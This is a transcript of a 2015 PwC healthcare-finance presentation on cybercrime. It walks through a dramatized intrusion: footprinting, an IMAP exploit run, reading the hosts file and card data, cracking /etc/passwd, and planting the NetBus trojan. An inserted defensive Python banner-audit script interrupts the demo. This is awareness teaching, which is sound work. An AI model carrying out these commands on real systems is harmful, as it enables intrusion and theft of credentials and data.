Coady: Cybersecurity & Cybercrime (HFMA Region 9 presentation)
TRANSCRIPT
11/9/2015
Cybersecurity & Cybercrime
Mick Coady, Partner, Cybersecurity & Privacy
PwC
A Total Novice Can Be a Hacker Today
Attack Sophistication vs. Intruder Technical Knowledge

[Chart: Attack Sophistication vs. Intruder Technical Knowledge, 1980 to 2000. Vertical axis: Intruder Knowledge, from High to Low. Horizontal axis: 1980, 1985, 1990, 1995, 2000. Attack sophistication rises over the period while the knowledge an intruder needs falls. Techniques plotted along the curve: password guessing, self-replicating code, password cracking, exploiting known vulnerabilities, disabling audits, back doors, hijacking sessions, burglaries, sweepers, sniffers, packet spoofing, GUI tools, automated probes/scans, denial of service, www attacks, "stealth"/advanced scanning techniques, network mgmt. diagnostics, distributed attack tools, staged and auto-coordinated attacks, cross site scripting. Labels on the chart: Intruders, Tools.]
Common Threats
• Hackers – “Script Kiddies”
• Employees – former and disgruntled
• Domestic Competitors – “Competitive Intelligence”
• State Sponsored & Corporate Espionage
• Extremists – Earth Liberation Front (ELF)
Anatomy of an Attack

Anatomy of Attack: Modus Operandi
Footprinting – Scanning – Enumeration – Penetration – Escalate Privilege – Stealing/Damaging Corp. Information
• Physical Penetrations
• Company Profiling – Open Source Research
• Known Exploits
• Port Redirection of Packets
• Trojans – remote controlling systems
• Zone Transfers
• SNMP Sweeps
• Router Exploitation
• Key Loggers – Software and Hardware devices
• Denial of Service
• Buffer Overflows
Anatomy of Attack: Physical Penetrations
• Surveillance
• Dumpster Diving
• Impersonation of Authorized Personnel
Bigwidget.net
Registrant: Big Widget, Inc. (BIGWIDGET_DOM)
1111 Big Widget Drive
Really Big, CA 90120 US

Domain Name: BIGWIDGET.NET

Administrative Contact, Technical Contact:
Simms, Haywood (HS69)
[email protected]
1111 Big Widget Drive, UMIL04-07
Really Big, CA 90210
678-443-6001

Zone Contact, Billing Contact:
Dodge, Rodger (RD32)
[email protected]
1111 Big Widget Drive, UMIL04-47
Really Big, CA 90210
678-443-6014

Record last updated on 24-June-2000
Record expires on 20-Mar-2010
Record created on 14-Mar-1998
Database last updated on 7-Jun-2000 15:54

Domain servers in listed order:
EHECATL.BIGWIDGET.NET    10.1.1.53
NS1-AUTH.SPRINTLINK.NET  206.228.179.10
NS.COMMANDCORP.COM       130.205.70.10
hacker:~$ telnet mail.bigwidget.net 25
Trying 10.1.1.10 ...
Connected to mail.bigwidget.net.
Escape character is '^]'.
Connection closed by foreign host.

hacker:~$ telnet mail.bigwidget.net 143
Trying 10.1.1.10...
Connected to mail.bigwidget.net.
* OK bigwidget IMAP4rev1 Service 9.0(157) at Wed, 14 Oct 1998 11:51:50 -0400 (EDT)
(Report problems in this server to [email protected])
. logout
* BYE bigwidget IMAP4rev1 server terminating connection
. OK LOGOUT completed
Connection closed by foreign host.
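The banners captured in the demo sessions (IMAP, FTP, Telnet) give away product and version, which is what the footprinting stage feeds on. As an added example that is not part of the original deck, here is a defender-side Python check that runs over an inventory of banners already collected from one's own hosts and flags cleartext services and version disclosure; the port table, regexes and sample banners are constructed for this illustration from the transcript.

```python
import re

# Cleartext protocols that should not face untrusted networks. The demo
# above abuses each of them: SMTP/IMAP on the mail host, FTP and Telnet on
# "thesource". Port -> protocol name (illustrative table, not exhaustive).
CLEARTEXT_PORTS = {21: "ftp", 23: "telnet", 25: "smtp", 110: "pop3", 143: "imap"}

# Banner patterns that leak product and version; each yields (product, version).
# Written for the banner styles shown in the transcript.
VERSION_PATTERNS = [
    re.compile(r"\* OK \S+ (IMAP4rev1) Service ([\d.()]+)"),
    re.compile(r"220 \S+ (Microsoft FTP Service) \(Version ([\d.]+)\)"),
    re.compile(r"(Red Hat Linux) release ([\d.]+)"),
    re.compile(r"(Telnet Server) Build ([\d.]+)"),
]

def assess_banner(host, port, banner):
    """Return a list of finding strings for one captured banner."""
    findings = []
    proto = CLEARTEXT_PORTS.get(port)
    if proto:
        findings.append(f"{host}:{port} exposes cleartext {proto}")
    for pat in VERSION_PATTERNS:
        m = pat.search(banner)
        if m:
            findings.append(f"{host}:{port} discloses {m.group(1)} {m.group(2)}")
            break
    return findings

def assess_inventory(captures):
    """captures: iterable of (host, port, banner); returns findings in capture order."""
    out = []
    for host, port, banner in captures:
        out.extend(assess_banner(host, port, banner))
    return out

# Constructed sample, transcribed from the demo session in the deck.
SAMPLE = [
    ("mail.bigwidget.net", 143, "* OK bigwidget IMAP4rev1 Service 9.0(157) at Wed, 14 Oct 1998 11:51:50 -0400 (EDT)"),
    ("mail.bigwidget.net", 25, ""),  # connection closed before any greeting
    ("thesource", 21, "220 thesource Microsoft FTP Service (Version 4.0)."),
    ("thesource", 23, "Microsoft (R) Windows 2000\nWelcome to MS Telnet Service\nTelnet Server Build 5.00.98217.1"),
]

if __name__ == "__main__":
    for finding in assess_inventory(SAMPLE):
        print(finding)
```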
hacker:~$ ./imap_exploit mail.bigwidget.com
IMAP Exploit for Linux.
Author: Akylonius ([email protected])
Modifications: p1 ([email protected])
Completed successfully.

hacker:~$ telnet mail.bigwidget.com
Trying 10.1.1.10...
Connected to mail.bigwidget.com.
Red Hat Linux release 4.2 (Biltmore)
Kernel 2.0.35 on an i686
login: root
bigwidget:~# whoami
root
bigwidget:~# cd /etc
bigwidget:~# cat ./hosts
127.0.0.1   localhost localhost.localdomain
10.1.1.9    thevault    medical records
10.1.1.11   fasttalk    PACS
10.1.1.12   geekspeak   engineering
10.1.1.13   people      human resources
10.1.1.14   thelinks    finance
10.1.1.15   thesource   information systems
bigwidget:~# cd /data/creditcards
bigwidget:~# cat visa.txt
Allan B. Smith     6543-2223-1209-4002  12/99
Donna D. Smith     6543-4133-0632-4572  06/98
Jim Smith          6543-2344-1523-5522  01/01
Joseph L. Smith    6543-2356-1882-7532  04/02
Kay L. Smith       6543-2398-1972-4532  06/03
Mary Ann Smith     6543-8933-1332-4222  05/01
Robert F. Smith    6543-0133-5232-3332  05/99
bigwidget:~# crack /etc/passwd
Cracking /etc/passwd...
username: bobman  password: nambob
username: jsmith  password: redbirds
username: root    password:
bigwidget:~# ftp thesource
Connected to thesource.
220 thesource Microsoft FTP Service (Version 4.0).
Name: jsmith
331 Password required for jsmith.
Password: ********
230 User jsmith logged in.
Remote system type is Windows_NT.
ftp> cd \temp
250 CWD command successful.
ftp> send netbus.exe
local: netbus.exe remote: netbus.exe
200 PORT command successful.
150 Opening BINARY mode data connection for netbus.exe
226 Transfer complete.
ftp> quit

thevault:~$ telnet thesource
Trying 10.1.1.15...
Connected to thesource.bigwidget.com.
Escape character is '^]'.
Microsoft (R) Windows 2000
Welcome to MS Telnet Service
Telnet Server Build 5.00.98217.1
login: jsmith
password: ********
*===============================================================
Welcome to Microsoft Telnet Server.
*===============================================================
C:\>cd \temp
C:\TEMP> netbus.exe

NetBus 1.6, by cf
Connected to the.source.bigwidget.com
Screendump:
David Smith
Postmaster <[email protected]>
[email protected]; [email protected]
Greetings <URGENT>
Greetings Bigwidget employees:
I have officially compromised your entire system, and have obtained all of your accounting information.
Yours Truly,
Friendly Hacker
Anatomy of Attack (Continued)
[Network diagram: Router, Firewall, Web, FTP, and Clients & Workstations, with the imap and NetBus attack paths from the demo overlaid.]

Cyber Security
http://map.ipviking.com